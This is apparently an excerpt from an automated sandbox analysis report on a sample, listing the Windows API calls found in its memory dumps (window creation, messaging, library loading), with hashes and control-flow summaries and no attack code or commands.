                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c563882e2544aaa26b46da3488b1129a46332c18696bee3f048a8a2d61a65b3a
                                                                                                      • Instruction ID: 998bca0c6aac7148e5b1a09a5c082b9581c793542c836013b33861abd479901e
                                                                                                      • Opcode Fuzzy Hash: c563882e2544aaa26b46da3488b1129a46332c18696bee3f048a8a2d61a65b3a
                                                                                                      • Instruction Fuzzy Hash: B2C16A31D202598FDF65CFA8D981B9DBBF2AF84310F15826ADC09AB255EB30D985CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph: function at 6251b90 (rendered graph omitted; basic blocks span 6251b90-6251e61; internal calls to 6251f36, 6251f56 and 6250aa8; CreateWindowExW called in block 6251d73-6251e12).
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 69acedf530f98a939d76fe3b16f19b872cc583d8e13663a3b9df2975346614e6
                                                                                                      • Instruction ID: 44abbfdfe8d61279fbfac40df4ce6e58ea0ba07976354eb3751d4b4b166b8420
                                                                                                      • Opcode Fuzzy Hash: 69acedf530f98a939d76fe3b16f19b872cc583d8e13663a3b9df2975346614e6
                                                                                                      • Instruction Fuzzy Hash: 6B8192B1C043899FDB12CFA5CC50ACDBFB1AF1A310F05819AE844AB262D7749955CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph: function at 2b8b1d0 (rendered graph omitted; basic blocks span 2b8b1d0-2b8b450; internal calls to 2b8aba4, 2b8b468, 2b8b45b, 2b8abb0, 2b8abc0, 2b8abd0 and 2b8abe0; GetModuleHandleW called in block 2b8b408-2b8b433).
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B8B426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 53184edb2f610563e2f4fefdb5a267a81a09a2199e723babc018f483e5a30a37
                                                                                                      • Instruction ID: cd5c22cb4bbf051ecaac18fba4226ae79a0d2c7ef0837933f66c69ec57cb9066
                                                                                                      • Opcode Fuzzy Hash: 53184edb2f610563e2f4fefdb5a267a81a09a2199e723babc018f483e5a30a37
                                                                                                      • Instruction Fuzzy Hash: 56711170A00B058FDB24EF69D15175ABBF2FF88308F108A6ED48AD7A50D774E945CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph: function at 6250aa8 (rendered graph omitted; basic blocks span 6250aa8-6251e61 and share the tail blocks 6251d58-6251e61 with the 6251b90 function above; CreateWindowExW called in block 6251d73-6251e12).
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06251E02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 82049bed87738f074df104d9fabedd5cd65ec2794eb155e947f38728ea477ef5
                                                                                                      • Instruction ID: fbbf72c81ab295ef41e8670f3307192958008a749759b72f0c0e74875e9f101f
                                                                                                      • Opcode Fuzzy Hash: 82049bed87738f074df104d9fabedd5cd65ec2794eb155e947f38728ea477ef5
                                                                                                      • Instruction Fuzzy Hash: DA51D1B1D10319DFDB24CF99C984ADEBBB5FF48310F24812AE818AB210D770A855CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 2b85d12-2b85e79; CreateActCtxA is called from the entry block 2b85d12-2b85df1.
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02B85DE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 908d35e41ec36943709f07bd5d87db8442168ecdc1a1f4c276577d5ec6d924ec
                                                                                                      • Instruction ID: 404bd706e423de03951f0ee21adbfe41aea2f09b7d1875f1aee534d479c2ac77
                                                                                                      • Opcode Fuzzy Hash: 908d35e41ec36943709f07bd5d87db8442168ecdc1a1f4c276577d5ec6d924ec
                                                                                                      • Instruction Fuzzy Hash: D94122B1C00619CFDB24DFA9C884BDDBBF5BF49304F24819AD408AB261DB756986CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 6250bfc-62543cc; CallWindowProcW is called from block 625434a-6254382, and block 625439c-62543bc calls the internal routine at 6250ad4.
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06254371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: 29a783ce93a987336884891737a738f3971dd1e66f74302c794d7995532c31b0
                                                                                                      • Instruction ID: 0a1089a89a39b6ec67e368ba1809ea0d2ddae3c8a1004856a9e4d3d644bf96e3
                                                                                                      • Opcode Fuzzy Hash: 29a783ce93a987336884891737a738f3971dd1e66f74302c794d7995532c31b0
                                                                                                      • Instruction Fuzzy Hash: 034138B4910305DFDB54DF99C488AAAFBF5FB88314F25C459E919AB320D774A881CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 2b84524-2b85e79; CreateActCtxA is called from the entry block 2b84524-2b85df1.
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 02B85DE1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 0bd7ae3b491b4140b98dbf29fbf3983a04eba421e203019a3fd670dd6272bcd8
                                                                                                      • Instruction ID: 1a361efe1fcd0f1fd3333354b1a62325bf99a9f235d585f8a0d0113b92046d27
                                                                                                      • Opcode Fuzzy Hash: 0bd7ae3b491b4140b98dbf29fbf3983a04eba421e203019a3fd670dd6272bcd8
                                                                                                      • Instruction Fuzzy Hash: 7041E2B1C00619CBDB24DFA9C984BDDBBF5BF48304F6480AAD408AB255DB756945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 625b510-625b602; CreateIconFromResourceEx is called from block 625b54a-625b5dc, with internal calls to 625a174 (block 625b525) and 625afd0 (block 625b537-625b547).
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: f646623115d4cf7188958ce0606bb51eaa8dabd101da0ccc1d446b5b407296cb
                                                                                                      • Instruction ID: 8a7635f1eb07ed3a75d1af543fe6dadda799be2e3d288982a523bbabe0708793
                                                                                                      • Opcode Fuzzy Hash: f646623115d4cf7188958ce0606bb51eaa8dabd101da0ccc1d446b5b407296cb
                                                                                                      • Instruction Fuzzy Hash: 533187729003599FCB12CFA9D941AEEBFF8EF09350F14805AE954AB221C335E954DFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 2b8abf0-2b8b6e5; LoadLibraryExW is called from block 2b8b690-2b8b6bf.
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: e1c379cce6545c640da964c382d22a3da3ae9cdef37bcb451cacbd8db4d39c13
                                                                                                      • Instruction ID: 24b784b5b5e4f56bba4509e4ab1c2a9c9fd463a0ad31ad8dfcfa45b18281d35f
                                                                                                      • Opcode Fuzzy Hash: e1c379cce6545c640da964c382d22a3da3ae9cdef37bcb451cacbd8db4d39c13
                                                                                                      • Instruction Fuzzy Hash: 7431BCB28053898FCB10DFA9C994BCAFFF0EF55214F0580AAC498AB351C3749545CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Entry block 625c3e2-625c3e9, basic blocks spanning 625c388-625c45d; SendMessageW is called from block 625c39d-625c3ba, and block 625c3ee-625c40d calls the internal routines at 6254590 and 62523a0.
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 128cc96db0b5dad847cc3ea52e5cf20cfe092ef2051dc6ba8831276c04846f7e
                                                                                                      • Instruction ID: 43636c77bc65c137177f5cd0b4ca8db59cc5f128092141588c87515be8b849a5
                                                                                                      • Opcode Fuzzy Hash: 128cc96db0b5dad847cc3ea52e5cf20cfe092ef2051dc6ba8831276c04846f7e
                                                                                                      • Instruction Fuzzy Hash: E7216D72E253845ED771576898047EBBFE48F56314F09809EDC886B283D6784885C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph not reproduced] Basic blocks 6ef2890-6ef294c; EnumThreadWindows is called from block 6ef28e6-6ef2916.
                                                                                                      APIs
                                                                                                      • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06EF2878,03D2411C,02D788B0), ref: 06EF2909
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumThreadWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941952884-0
                                                                                                      • Opcode ID: 6723698fe244a11f50090a7f14133d1885d45227e7d5e98ee500966c880ac6da
                                                                                                      • Instruction ID: 8cdfa722e9594d9aadca3e307bb62d0bf9a09e857db02c54f846872609cdaaed
                                                                                                      • Opcode Fuzzy Hash: 6723698fe244a11f50090a7f14133d1885d45227e7d5e98ee500966c880ac6da
                                                                                                      • Instruction Fuzzy Hash: B1218BB1D002099FDB10CFAAC844BEEFBF8FB88320F00842AD554A3250D774A945CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B8D666,?,?,?,?,?), ref: 02B8D727
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 870c8fc767205fec5469b10d6dea55eaeb7815e3c05548ab811cc13c54402db2
                                                                                                      • Instruction ID: bb3c103fb3efa819f5c8ef08ef92d8dc7a9a094b36e0952e15d1a7dd58cc559a
                                                                                                      • Opcode Fuzzy Hash: 870c8fc767205fec5469b10d6dea55eaeb7815e3c05548ab811cc13c54402db2
                                                                                                      • Instruction Fuzzy Hash: 472114B5900249EFDB10DFAAD584ADEFBF4EB48310F14845AE958A7350D374A940CFA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B8D666,?,?,?,?,?), ref: 02B8D727
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 0407d5e3e255b21da72275efe5f0d1c6b12475a65d1fb1cf10eb86c4ab8b7bba
                                                                                                      • Instruction ID: 0d5d79d29b7bb27d0e9ce8254918a59a9b47414097b8dd552696393d7eda9ee4
                                                                                                      • Opcode Fuzzy Hash: 0407d5e3e255b21da72275efe5f0d1c6b12475a65d1fb1cf10eb86c4ab8b7bba
                                                                                                      • Instruction Fuzzy Hash: 9F21E0B5901259EFDB10CFAAD584AEEBBF4EB48320F14845AE958A7350C374A940CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06EF2878,03D2411C,02D788B0), ref: 06EF2909
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumThreadWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941952884-0
                                                                                                      • Opcode ID: bab5243da35ef43bd0ce21abe5b426c8b408c9f97b79af30d4db145a73238370
                                                                                                      • Instruction ID: bee34b88732325d3a7aa6599ad8368d522356cae8b01dfc32b8fd830fde303d1
                                                                                                      • Opcode Fuzzy Hash: bab5243da35ef43bd0ce21abe5b426c8b408c9f97b79af30d4db145a73238370
                                                                                                      • Instruction Fuzzy Hash: 9E2147B1D003198FDB14DF9AC844BEEFBF4EB88320F10842AD558A7250D778AA45CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 9f0c11b5865861ae51721ef83b1c62673713fc4215da24ce01ed43f8117a9040
• Instruction ID: 5ed97054136b09903e29ae34aa9e9fccd6416bfd590e5b8c08671b9b26c29e12
• Instruction Fuzzy Hash: 6C1179B6914309DFDB60CF99C844BDEBBF4AF48310F15445ED884E7251D3789644CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0625B52A,?,?,?,?,?), ref: 0625B5CF
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 19bd184d6fb6a66a53d7e25af7e92f870e9984256a7625d52a8093b0d96ad937
• Instruction ID: 2904a63fb996809194c772cdf639de1a1d1ea36ce6ff9135c23e3f60a0acd070
• Instruction Fuzzy Hash: 7B113AB590025DDFDB20DF9AD844BDEBFF8EB48310F14841AE954A7210C375A950CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
Memory Dump Source
• Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: f829f20e4859991fdfb726801cc9399ce6f9514cfd477c100061944045da5b4c
• Instruction ID: 7d50764fd9dcce33878b17482700844ec92b79cacd8d3c835e498bb0eaa7f8f7
• Instruction Fuzzy Hash: 401126B69003499FDB10DFAAC444ADEFBF4EB48314F10846AD559A7210C375A945CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B8B4A1,00000800,00000000,00000000), ref: 02B8B6B2
Memory Dump Source
• Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: f9a7dac6005733c8e7e79ceca533b06d3528de6d6e80de010f3e1fc53eaa3534
• Instruction ID: a1ca828140cc4622dc5c049cf2e8a48e700eef5343ac118f261344b6fdc12b83
• Instruction Fuzzy Hash: 921123B6D002498FDB14DFAAC444ADEFBF4EF88314F14846AD859A7210C375A545CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 067E53E5
Memory Dump Source
• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: b46d6b0b60507233c20d61db1d3a20f34d260d307d5ab82222293e2967169cf6
• Instruction ID: 8e63bf3b48a594d13c54a0c20b4e787f45da6f3f65fc9bc508b6e59a76e53755
• Instruction Fuzzy Hash: 2E113AB5800349DFDB10CF9AC845BEEFBF8EB48324F10841AE554A3240C375A944CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 067E4B08
Memory Dump Source
• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 84c8d37d1cddcbde1c94fc86c230b2a7c26187dd73ab9d34ad01635bcfd982e9
• Instruction ID: c1eefceacc38945e926ca02ed6d73870341f8287a3f119b045296498a303105c
• Instruction Fuzzy Hash: 1B111FB58043889FDB10CF99C94ABDEBFF4AB09324F14845AD564A7281C375AA84CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06EF33BD
Memory Dump Source
• Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 90b00c25eb0fc3164b852c5d345cf2a6856536aaca3f778f421dc4f5ba2505d5
• Instruction ID: 28fe014bfe4c4f887c1f5d6a7728abb39c1d602ba039403a7b00afc30a190537
• Instruction Fuzzy Hash: C311F2B59003489FDB10DF9AD889BDEBFF8EB48320F10841AE558A7210C375A984CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 067E53E5
Memory Dump Source
• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: e8deaf1e762d894ab1a67d74f1bccb218021af37d95eeafef098e6d06963c37b
• Instruction ID: c48305a342ec3f1a56a32763e4a6a034d03e387c709e1ee0fa90c4d9a136eca9
• Instruction Fuzzy Hash: A41118B5800349DFDB10CF9AC885BEEFBF8EB48324F10841AE554A3250D379A984CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 02B8B426
Memory Dump Source
• Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: b1ed30f94ad899c8a2f983abcbf722ea3cfc03ac6003f9837a2e45d7d2a8fe3d
• Instruction ID: ed0c7f5c2688151fad98b0e5bd96123d8fa4e157fbc8dd995c1887308f91ae2a
• Instruction Fuzzy Hash: F3110FB6C002498FDB10DFAAD444ADEFBF4EB88324F18846AD858A7211C375A545CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c10e9f1d29c62cc43c2c1c1998eb4c697d42b186c7797347449fa0a90e05e1d4
• Instruction ID: bba25322d1ffdde396f0086b031aa4f07a930e79b587381bd7e94002b6c774fb
• Instruction Fuzzy Hash: 6F1136B5900348DFDB20DF8AC884BDEBBF8EB48310F108419E958A7200D375A944CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0625B92D
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 440c6d1849f2b767b6b71c2416d8d51ece7bb7249555a623ff0ddaf48d340f2a
• Instruction ID: b6546a65496a9c7a8a8239c3fe853d1ecae016fd04e25743b2899fd31a583c21
• Instruction Fuzzy Hash: 771106B5810349DFDB20DF9AD585BDEFBF8EB48320F10845AE954A7200C375A944CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0625B92D
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 6fe10995d3de54d35dd4c572ddbf0904480502c866ee97204037d40e5f43b2f6
• Instruction ID: 93df7f1107f536b3a47036b71e4e5ad0fc4a9a2d812073eb345442d4452f573d
• Instruction Fuzzy Hash: 011103B5800209DFDB50DF99D985BDEFBF4FB48320F14881AD958A7250C374AA44CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06EF33BD
Memory Dump Source
• Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 7919d1317408ef9ec46f9edc3397bc202c471425f3cba1ee3dfd5090b1ddf8ef
• Instruction ID: b693f66ef91daa52a5cab801bcf55d4ce88ccc1c6d693e383d76e3797a53ee17
• Instruction Fuzzy Hash: 2E11F2B5900348DFDB10DF9AD889BDEBBF8EB48320F10841AE959A7210C375A944CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 067E4B08
Memory Dump Source
• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 3ceb6639c5edabc2edb49ce508523aacaf34e9b6212631eb16494ca99dfc03cd
• Instruction ID: 9645bd54df8dcea2d6ba805b8204827ca8402ba181e5203d855a24c104acc546
• Instruction Fuzzy Hash: 50110470900248DEDB10CF89D849BDEBFF4EB08324F10881AD555A7244C375A544CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
Memory Dump Source
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: f147e9cc283f09fcc5b8c75473f0c810c188dd0385bb47c7ab954e60091ad063
• Instruction ID: 9a7b086bcffb580befae29fe4fd259948c15d09d6dacac3cade6a7061b501774
• Instruction Fuzzy Hash: A01103B5800309DFDB50DF99D985BDEBBF8EB48310F10841AE958A7610C374A984CFA1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 067E6DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
